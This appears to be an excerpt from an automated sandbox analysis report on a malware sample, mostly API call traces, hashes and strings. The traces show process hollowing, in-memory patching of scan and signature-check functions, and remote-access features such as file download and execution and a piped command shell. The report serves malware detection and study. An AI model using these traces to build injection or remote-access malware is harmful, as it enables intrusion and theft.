                                                                                                                                                    • Instruction Fuzzy Hash: CCC08CA06123060E6E9072FC1CC02A9528A8964938B601BA9E02EE63C1D311DC226830
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DE4C60 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SysFreeString.OLEAUT32(02DFD42C), ref: 02DE4C32
                                                                                                                                                    • SysReAllocStringLen.OLEAUT32(02E09E50,02DFD42C,00000016), ref: 02DE4C7A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: String$AllocFree
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 344208780-0
                                                                                                                                                    • Opcode ID: 0aec7a72195ce8a2f02e67a76ce15a9c0b7882c7f493080007ec41662f53ab3b
                                                                                                                                                    • Instruction ID: bed1ebe48d8e07de5411e5752d30edd22e4ba91594d417395c55fab0909452fc
                                                                                                                                                    • Opcode Fuzzy Hash: 0aec7a72195ce8a2f02e67a76ce15a9c0b7882c7f493080007ec41662f53ab3b
                                                                                                                                                    • Instruction Fuzzy Hash: 31D012641005019A9E3C75164D0593661AED9D030A74CCA5998034B340E7A1DC40CA39
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DE4C3C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeString
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3341692771-0
                                                                                                                                                    • Opcode ID: aa052d25dd78002e50aa44a6486536333a5d6d40c34ef5eb19ce88693e560bd5
                                                                                                                                                    • Instruction ID: 9c92ea0949850e950cfc4f7ad6c3fa404b2561d4506dfbbf28b7caacef5f8b16
                                                                                                                                                    • Opcode Fuzzy Hash: aa052d25dd78002e50aa44a6486536333a5d6d40c34ef5eb19ce88693e560bd5
                                                                                                                                                    • Instruction Fuzzy Hash: 76C012A160022047EF21AA599CC075962CCDB05295F1440A1D51ADB340E764DC00C674
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02E09B3C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • timeSetEvent.WINMM(00002710,00000000,02E09B30,00000000,00000001), ref: 02E09B4C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Eventtime
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2982266575-0
                                                                                                                                                    • Opcode ID: 6d00877cd281de36e0927669bd922da2fcebb6d0bc994ef994e904bca4c8bc65
                                                                                                                                                    • Instruction ID: 4daa4b4f9c44151adb2f2f70ed6016265cedd290ce39b1830317ae70467439e2
                                                                                                                                                    • Opcode Fuzzy Hash: 6d00877cd281de36e0927669bd922da2fcebb6d0bc994ef994e904bca4c8bc65
                                                                                                                                                    • Instruction Fuzzy Hash: 6CC09BF17E13007FF51069A51CD2F77158DD714B10F9054117601DD2C2D5E65C514674
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DE4BFC Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02DE4C03
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocString
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2525500382-0
                                                                                                                                                    • Opcode ID: a58847c83cd719dccc7eadc7ea48a36911e6046ec6b401b7504d2a9bf001b2b2
                                                                                                                                                    • Instruction ID: 99aa12515b2689983c7f5d599b86235c262597706b428c579b60b141688c9e28
                                                                                                                                                    • Opcode Fuzzy Hash: a58847c83cd719dccc7eadc7ea48a36911e6046ec6b401b7504d2a9bf001b2b2
                                                                                                                                                    • Instruction Fuzzy Hash: E9B0123830820118FE2431230E0173A004C4F90389F8800519F5BCC3C0FB41CC01C83B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DE4C14 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 02DE4C1B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeString
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3341692771-0
                                                                                                                                                    • Opcode ID: 98a5ded0fdb0df2e5a062e13461102ebbb408f0f94918d0aa90ba91e9420b17a
                                                                                                                                                    • Instruction ID: e32f906aed8f9eec0158db6476ee320fbf8a2950183a202bcc0affda712ceffd
                                                                                                                                                    • Opcode Fuzzy Hash: 98a5ded0fdb0df2e5a062e13461102ebbb408f0f94918d0aa90ba91e9420b17a
                                                                                                                                                    • Instruction Fuzzy Hash: 9EA011A8200A028A8E0A322A080022E2022AEC0200BC8C8A802020A2008A3A8C00A838
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DE15CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02DE1A03,?,02DE1FC1), ref: 02DE15E2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                    • Opcode ID: ec4158c0ffc41dee0fbc74e28a10d8fddf0007023620a9034d0e051db5f69dbd
                                                                                                                                                    • Instruction ID: 158539a6c8b6a0610c492cad2fd34b30f6e18b618a24309c824e8cf28ea688bc
                                                                                                                                                    • Opcode Fuzzy Hash: ec4158c0ffc41dee0fbc74e28a10d8fddf0007023620a9034d0e051db5f69dbd
                                                                                                                                                    • Instruction Fuzzy Hash: EEF049F4B813004FDB06DF7A9949B057AD2EB89348F90857DEB0ADB388E77188468B10
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DE1682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02DE1FC1), ref: 02DE16A4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                    • Opcode ID: 3d8f33e3cec7714336801adf2b362a477462ba1af09d2959d702e1357c50c29c
                                                                                                                                                    • Instruction ID: a9bb128d5d7bd52763c8d721eae61ed9e90c1c67aed571e13e88beb5e65114a7
                                                                                                                                                    • Opcode Fuzzy Hash: 3d8f33e3cec7714336801adf2b362a477462ba1af09d2959d702e1357c50c29c
                                                                                                                                                    • Instruction Fuzzy Hash: 70F090B6B806D56FD710AE5AAC84B82BBE4FB41318F454139F90897380D770AC52CB94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DE16E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02DE1704
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                    • Opcode ID: 48c1a4558b65e657f96e5c96591caa55a891f01fd718c07ec2e6a348de971d02
                                                                                                                                                    • Instruction ID: dbcc6150c50ebc6f8ecf99de575adecc9218e2966d2e10d95d4d4f10bb54beaf
                                                                                                                                                    • Opcode Fuzzy Hash: 48c1a4558b65e657f96e5c96591caa55a891f01fd718c07ec2e6a348de971d02
                                                                                                                                                    • Instruction Fuzzy Hash: A6E08675300311AFDB107A7A5D45B126BD9EB45654F154475F54ADB381D270EC118B70
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 02DF7F48 Relevance: 41.9, APIs: 8, Strings: 15, Instructions: 1602nativethreadprocessCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 02DF7BE8: LoadLibraryW.KERNEL32(?,00000000,02DF7C9A), ref: 02DF7C18
                                                                                                                                                      • Part of subcall function 02DF7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02DF7C9A), ref: 02DF7C1E
                                                                                                                                                      • Part of subcall function 02DF7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02DF7C37
                                                                                                                                                    • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02E45398,02E45388,OpenSession,02E45360,02DF9A30,ScanString,02E45360), ref: 02DF8446
                                                                                                                                                    • GetThreadContext.KERNEL32(00000000,02E453DC,ScanString,02E45360,02DF9A30,UacInitialize,02E45360,02DF9A30,ScanBuffer,02E45360,02DF9A30,ScanBuffer,02E45360,02DF9A30,UacInitialize,02E45360), ref: 02DF87DF
                                                                                                                                                    • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,02E454B0,00000004,02E454B8,ScanBuffer,02E45360,02DF9A30,ScanString,02E45360,02DF9A30,Initialize,02E45360,02DF9A30,UacScan,02E45360), ref: 02DF8A3C
                                                                                                                                                    • NtUnmapViewOfSection.N(00000000,?,ScanBuffer,02E45360,02DF9A30,ScanString,02E45360,02DF9A30,Initialize,02E45360,02DF9A30,00000000,-00000008,02E454B0,00000004,02E454B8), ref: 02DF8BB7
                                                                                                                                                      • Part of subcall function 02DF7968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02DF7975
                                                                                                                                                      • Part of subcall function 02DF7968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02DF797B
                                                                                                                                                      • Part of subcall function 02DF7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DF799B
                                                                                                                                                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,02E454B8,ScanBuffer,02E45360,02DF9A30,ScanString,02E45360,02DF9A30,Initialize,02E45360,02DF9A30,ScanBuffer,02E45360), ref: 02DF920B
                                                                                                                                                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,02E454B4,00000004,02E454B8,ScanBuffer,02E45360,02DF9A30,ScanString,02E45360,02DF9A30,Initialize,02E45360,02DF9A30,00000000,00000000), ref: 02DF937E
                                                                                                                                                    • SetThreadContext.KERNEL32(00000000,02E453DC,ScanBuffer,02E45360,02DF9A30,ScanString,02E45360,02DF9A30,Initialize,02E45360,02DF9A30,00000000,-00000008,02E454B4,00000004,02E454B8), ref: 02DF94F4
                                                                                                                                                    • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02E453DC,ScanBuffer,02E45360,02DF9A30,ScanString,02E45360,02DF9A30,Initialize,02E45360,02DF9A30,00000000,-00000008,02E454B4), ref: 02DF9501
                                                                                                                                                      • Part of subcall function 02DF7AC0: LoadLibraryW.KERNEL32(bcrypt,02DF9A30,Initialize,02E45360,02DF9A30,UacScan,02E45360,02DF9A30,UacInitialize,02E45360,02DF9A30,00000000,02E453DC,ScanString,02E45360,02DF9A30), ref: 02DF7AD2
                                                                                                                                                      • Part of subcall function 02DF7AC0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DF7ADF
                                                                                                                                                      • Part of subcall function 02DF7AC0: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,02DF9A30,Initialize,02E45360,02DF9A30,UacScan,02E45360,02DF9A30,UacInitialize), ref: 02DF7AF6
                                                                                                                                                      • Part of subcall function 02DF7AC0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,02DF9A30,Initialize,02E45360,02DF9A30,UacScan,02E45360,02DF9A30,UacInitialize,02E45360,02DF9A30,00000000,02E453DC), ref: 02DF7B05
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MemoryVirtual$AddressLibraryProcThreadWrite$ContextHandleLoadModule$AllocateCreateFreeProcessReadResumeSectionUnmapUserView
                                                                                                                                                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc
                                                                                                                                                    • API String ID: 2533507481-2367850715
                                                                                                                                                    • Opcode ID: 2c13057359998f023b48a785564c569c0fdc02b7071b71e23f71242d3a13cbab
                                                                                                                                                    • Instruction ID: 20102072a3bc13995f445c38235a3767b59ddc00bf4af2c90e93840453d0bca8
                                                                                                                                                    • Opcode Fuzzy Hash: 2c13057359998f023b48a785564c569c0fdc02b7071b71e23f71242d3a13cbab
                                                                                                                                                    • Instruction Fuzzy Hash: 56E20934A502689BDF51FB60DC90FCEB3B6EF55700F5180A5E20AAB314DA30AE85CF65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02DF7F46 Relevance: 41.8, APIs: 8, Strings: 15, Instructions: 1553nativeprocessthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 02DF7BE8: LoadLibraryW.KERNEL32(?,00000000,02DF7C9A), ref: 02DF7C18
                                                                                                                                                      • Part of subcall function 02DF7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02DF7C9A), ref: 02DF7C1E
                                                                                                                                                      • Part of subcall function 02DF7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02DF7C37
                                                                                                                                                    • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02E45398,02E45388,OpenSession,02E45360,02DF9A30,ScanString,02E45360), ref: 02DF8446
                                                                                                                                                    • GetThreadContext.KERNEL32(00000000,02E453DC,ScanString,02E45360,02DF9A30,UacInitialize,02E45360,02DF9A30,ScanBuffer,02E45360,02DF9A30,ScanBuffer,02E45360,02DF9A30,UacInitialize,02E45360), ref: 02DF87DF
                                                                                                                                                    • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,-00000008,02E454B0,00000004,02E454B8,ScanBuffer,02E45360,02DF9A30,ScanString,02E45360,02DF9A30,Initialize,02E45360,02DF9A30,UacScan,02E45360), ref: 02DF8A3C
                                                                                                                                                    • NtUnmapViewOfSection.N(00000000,?,ScanBuffer,02E45360,02DF9A30,ScanString,02E45360,02DF9A30,Initialize,02E45360,02DF9A30,00000000,-00000008,02E454B0,00000004,02E454B8), ref: 02DF8BB7
                                                                                                                                                      • Part of subcall function 02DF7968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02DF7975
                                                                                                                                                      • Part of subcall function 02DF7968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 02DF797B
                                                                                                                                                      • Part of subcall function 02DF7968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DF799B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressHandleMemoryModuleProcVirtual$AllocateContextCreateLibraryLoadProcessReadSectionThreadUnmapUserView
                                                                                                                                                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc
                                                                                                                                                    • API String ID: 3979268988-2367850715
                                                                                                                                                    • Opcode ID: 152666f876633a09bf1a46597a798f1e7acbe3f561550d4d02cb9c4f9d55bbb1
                                                                                                                                                    • Instruction ID: 46e2293c9351a108613cba2ff076f2439167651bd6027233d4a2809dcbd6b2c8
                                                                                                                                                    • Opcode Fuzzy Hash: 152666f876633a09bf1a46597a798f1e7acbe3f561550d4d02cb9c4f9d55bbb1
                                                                                                                                                    • Instruction Fuzzy Hash: D2E20934A502689BDF51FB60DC90FCEB3B6EF55700F5180A5E20AAB314DA70AE85CF65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 15687C97 Relevance: 34.1, APIs: 10, Strings: 9, Instructions: 835filesleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetEvent.KERNEL32(?,?), ref: 15687CB9
                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 15687D87
                                                                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 15687DA9
                                                                                                                                                      • Part of subcall function 1569C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,156F4EE0,?), ref: 1569C2EC
                                                                                                                                                      • Part of subcall function 1569C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,156F4EE0,?), ref: 1569C31C
                                                                                                                                                      • Part of subcall function 1569C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,156F4EE0,?), ref: 1569C371
                                                                                                                                                      • Part of subcall function 1569C291: FindClose.KERNEL32(00000000,?,?,?,?,?,156F4EE0,?), ref: 1569C3D2
                                                                                                                                                      • Part of subcall function 1569C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,156F4EE0,?), ref: 1569C3D9
                                                                                                                                                      • Part of subcall function 15684AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15684B36
                                                                                                                                                      • Part of subcall function 1569B4EF: GetLocalTime.KERNEL32(00000000), ref: 1569B509
                                                                                                                                                      • Part of subcall function 15684AA1: WaitForSingleObject.KERNEL32(?,00000000,15681A45,?,?,00000004,?,?,00000004,156F6B50,156F4EE0,00000000), ref: 15684B47
                                                                                                                                                      • Part of subcall function 15684AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,156F6B50,156F4EE0,00000000,?,?,?,?,?,15681A45), ref: 15684B75
                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 15688197
                                                                                                                                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 15688278
                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 156884C4
                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 15688652
                                                                                                                                                      • Part of subcall function 1568880C: __EH_prolog.LIBCMT ref: 15688811
                                                                                                                                                      • Part of subcall function 1568880C: FindFirstFileW.KERNEL32(00000000,?,156E6608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 156888CA
                                                                                                                                                      • Part of subcall function 1568880C: __CxxThrowException@8.LIBVCRUNTIME ref: 156888F2
                                                                                                                                                      • Part of subcall function 1568880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 156888FF
                                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 156886F8
                                                                                                                                                    • StrToIntA.SHLWAPI(00000000,00000000), ref: 1568873A
                                                                                                                                                      • Part of subcall function 1569C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 1569CAD7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                                                                                    • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                                                                                                                                    • API String ID: 1067849700-1507758755
                                                                                                                                                    • Opcode ID: 9531dc844c9b06d822ad33d27ca17d0d32eb98f83fcf8066ae5325701287ac62
                                                                                                                                                    • Instruction ID: 1a5aa79ec72c1cf29d90f0d880d9439b42e5935283555afa1f7baa5fc0799e66
                                                                                                                                                    • Opcode Fuzzy Hash: 9531dc844c9b06d822ad33d27ca17d0d32eb98f83fcf8066ae5325701287ac62
                                                                                                                                                    • Instruction Fuzzy Hash: 4D427F79B0A304ABC618FB74CC659AE77A9AF91200F800D1CE543572D4EF75BA08C7DA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1568569A Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 278pipesleepfileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 156856E6
                                                                                                                                                      • Part of subcall function 15684AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15684B36
                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 15685723
                                                                                                                                                    • CreatePipe.KERNEL32(156F6CCC,156F6CB4,156F6BD8,00000000,156E60BC,00000000), ref: 156857B6
                                                                                                                                                    • CreatePipe.KERNEL32(156F6CB8,156F6CD4,156F6BD8,00000000), ref: 156857CC
                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,156F6BE8,156F6CBC), ref: 1568583F
                                                                                                                                                    • Sleep.KERNEL32(0000012C,00000093,?), ref: 15685897
                                                                                                                                                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 156858BC
                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 156858E9
                                                                                                                                                      • Part of subcall function 156B4770: __onexit.LIBCMT ref: 156B4776
                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,?,00000000,156F4F90,156E60C0,00000062,156E60A4), ref: 156859E4
                                                                                                                                                    • Sleep.KERNEL32(00000064,00000062,156E60A4), ref: 156859FE
                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 15685A17
                                                                                                                                                    • CloseHandle.KERNEL32 ref: 15685A23
                                                                                                                                                    • CloseHandle.KERNEL32 ref: 15685A2B
                                                                                                                                                    • CloseHandle.KERNEL32 ref: 15685A3D
                                                                                                                                                    • CloseHandle.KERNEL32 ref: 15685A45
